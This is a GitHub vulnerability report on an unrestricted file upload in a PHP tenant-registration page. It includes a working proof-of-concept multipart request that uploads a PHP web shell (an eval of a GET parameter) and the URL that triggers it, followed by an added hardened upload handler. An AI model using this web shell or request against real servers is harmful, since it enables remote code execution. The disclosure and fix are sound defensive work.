tenant-register.php has a file upload vulnerability #8

Closed
huclilu opened this issue Dec 2, 2022 · 0 comments
huclilu commented Dec 2, 2022

Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4

  1. tenant-register.php has a file upload vulnerability
  <form method="POST" action="tenant-engine.php" enctype="multipart/form-data">

tenant-register.php, line 9. The information filled in on the front end, including the uploaded file, is sent to the back end through a POST request. No filtering is performed in this process.

tenant-engine.php,

In tenant-engine.php, lines 40 to 51. The uploaded file is stored in the tenant-photo directory, and a successful upload returns the file name:

function tenant_register(){
	if(isset($_FILES['id_photo']))
	{
		// The client-supplied file name is used as-is to build the destination path.
		$id_photo='tenant-photo/'.$_FILES['id_photo']['name'];

		// echo $_FILES['image']['name'].'<br>';

		if(!empty($_FILES['id_photo'])){
			$path = "tenant-photo/";
			$path=$path. basename($_FILES['id_photo']['name']);
			// No check on extension, MIME type or content before the file is
			// moved into the web-accessible tenant-photo/ directory.
			if(move_uploaded_file($_FILES['id_photo']['tmp_name'], $path))
			{
				echo "The file ". basename($_FILES['id_photo']['name']). " has been uploaded";
			}
			else{
				echo "There was an error uploading the file, please try again!";
			}
		}
	}
}

POC:

POST /tenant-engine.php HTTP/1.1
Host: vulhrs.test
Content-Length: 942
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhrs.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20U7c62S7R9CYJAb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhrs.test/tenant-register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2c9e17rrnh26evjlb19dj3uavk
Connection: close

------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="full_name"

vul
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="email"

ace@ace.com
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="password"

666666
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="phone_no"

123456123
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="address"

aceace
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="id_type"

Citizenship
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="id_photo"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="tenant_register"


------WebKitFormBoundary20U7c62S7R9CYJAb--

Execute phpinfo:

http://vulhrs.test/tenant-photo/POC.php?ace=phpinfo();

@huclilu huclilu closed this as completed Dec 17, 2022
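A hardened replacement for the upload handling in tenant_register(), added here as an example and not taken from the project's code. It assumes the same form field name `id_photo` and the same `tenant-photo/` destination directory; the constants, the `store_id_photo` function name and the 2 MiB size limit are chosen for illustration.

```php
<?php
// Added example (not the project's own code): hardened ID photo upload.
// Assumes the form field 'id_photo' and the directory 'tenant-photo/' from the issue.

const TENANT_PHOTO_DIR = __DIR__ . '/tenant-photo/';
const MAX_PHOTO_BYTES  = 2 * 1024 * 1024; // 2 MiB cap (assumed policy)

// Allowlist of accepted image MIME types mapped to the extension that will be written.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate an uploaded ID photo and store it under a server-chosen name.
 * Returns the stored file name on success, throws RuntimeException otherwise.
 * The client-supplied file name, extension and Content-Type are never trusted.
 */
function store_id_photo(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file received');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not a genuine uploaded file');
    }
    if ($file['size'] > MAX_PHOTO_BYTES) {
        throw new RuntimeException('File exceeds size limit');
    }

    // Sniff the real content type from the file bytes, not from the request.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('Only JPEG or PNG images are accepted');
    }

    // Require the file to decode as an image; rejects script source with a fake header.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // Server-generated name: no user input reaches the filesystem path,
    // and the extension comes from the allowlist, never from the client.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = TENANT_PHOTO_DIR . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store the file');
    }
    chmod($dest, 0644); // readable by the web server, never executable

    return $name;
}

if (isset($_FILES['id_photo'])) {
    try {
        $stored = store_id_photo($_FILES['id_photo']);
        echo 'The file has been uploaded as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

Content sniffing and the extension allowlist are the first layer; because an image that also contains script text can still pass `getimagesize`, the stored name is generated by the server with a fixed image extension so the file is never served as PHP. As a second, independent layer, script execution should be disabled for the `tenant-photo/` directory itself (with Apache mod_php, as in the reported build environment, a `php_flag engine off` directive in that directory's `.htaccess` or in the vhost configuration), or the directory moved outside the web root and served through a handler that only returns image data.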